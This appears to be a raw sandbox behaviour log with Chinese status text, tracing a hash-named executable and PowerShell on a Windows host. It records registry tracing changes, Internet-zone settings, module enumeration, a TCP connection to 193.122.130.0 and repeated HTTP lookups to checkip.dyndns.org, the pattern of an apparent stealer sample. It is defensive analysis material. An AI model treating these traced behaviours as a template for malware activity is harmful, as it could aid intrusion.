09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\EnableAutoFileTracing,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\EnableConsoleTracing,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\FileTracingMask,	type:0x00000004 datalen:4 data:'00 00 FF FF ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\ConsoleTracingMask,	type:0x00000004 datalen:4 data:'00 00 FF FF ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\MaxFileSize,	type:0x00000004 datalen:4 data:'00 00 10 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\FileDirectory,	type:0x00000002 datalen:34 data:'25 77 69 6E 64 69 72 25 5C 74 72 61 63 69 6E 67 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:991,	powershell.exe,	5080:7324,	2928,	FILE_remove,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1,	,	0x00000000 [操作成功完成。  ],	
09:33:16:991,	powershell.exe,	5080:7324,	2928,	FILE_remove,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1,	,	0x00000000 [操作成功完成。  ],	
09:33:16:991,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_mkkey,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS,	access:0x0002001B ,	0x00000000 [操作成功完成。  ],	
09:33:16:991,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\EnableFileTracing,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\EnableAutoFileTracing,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\EnableConsoleTracing,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\FileTracingMask,	type:0x00000004 datalen:4 data:'00 00 FF FF ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\ConsoleTracingMask,	type:0x00000004 datalen:4 data:'00 00 FF FF ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\MaxFileSize,	type:0x00000004 datalen:4 data:'00 00 10 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\FileDirectory,	type:0x00000002 datalen:34 data:'25 00 77 00 69 00 6E 00 64 00 69 00 72 00 25 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	powershell.exe,	5080:1928,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	powershell.exe,	5080:1928,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:022,	powershell.exe,	5080:1928,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:022,	powershell.exe,	5080:1928,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:039,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:039,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:039,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll,	base:0x00000000684C0000 size:0x00357000 ,	0x00000000 [操作成功完成。  ],	
09:33:17:116,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:116,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll,	base:0x0000000073EC0000 size:0x00106000 ,	0x00000000 [操作成功完成。  ],	
09:33:17:148,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:148,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:148,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:163,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	NET_connect,	193.122.130.0:80,	protocol:(TCP)0 ,	0x00000000 [操作成功完成。  ],	
09:33:17:242,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:242,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:257,	powershell.exe,	5080:1928,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:272,	powershell.exe,	5080:1928,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:272,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll,	base:0x0000000068470000 size:0x0004C000 ,	0x00000000 [操作成功完成。  ],	
09:33:17:897,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:897,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:931,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\PackageManagement,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:931,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\Pester,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:931,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\PowerShellGet,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:931,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\PSReadline,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:931,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:931,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:944,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:944,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:944,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:944,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:976,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:976,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:991,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppBackgroundTask,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:991,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppLocker,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:194,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_touch,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1,	access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1,	offset:0x00000000 datalen:0x0000004D ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1,	,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_touch,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1,	access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1,	offset:0x00000000 datalen:0x0000004D ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1,	,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	FILE_remove,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1,	,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	FILE_remove,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1,	,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:304,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll,	base:0x00000000683C0000 size:0x000A4000 ,	0x00000000 [操作成功完成。  ],	
09:33:18:336,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Appx,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:336,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:351,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:366,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:366,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:366,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\PackageManagement,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:366,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\Pester,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:366,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\PowerShellGet,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\PSReadline,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:398,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:413,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:429,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:429,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:522,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	NET_http,	checkip.dyndns.org/,	protocol:(TCP)0 cmd:'GET' ,	0x00000000 [操作成功完成。  ],	
09:33:18:522,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	NET_send,	193.122.130.0:80,	protocol:(TCP)0 datalen:151 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:585,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	NET_connect,	193.122.130.0:80,	protocol:(TCP)0 ,	0x00000000 [操作成功完成。  ],	
09:33:18:632,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	NET_http,	checkip.dyndns.org/,	protocol:(TCP)0 cmd:'GET' ,	0x00000000 [操作成功完成。  ],	
09:33:18:632,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	NET_send,	193.122.130.0:80,	protocol:(TCP)0 datalen:151 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:650,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:650,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BranchCache,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:664,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\CimCmdlets,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:664,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\ConfigCI,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:664,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:664,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:680,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:680,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:788,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.xml.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
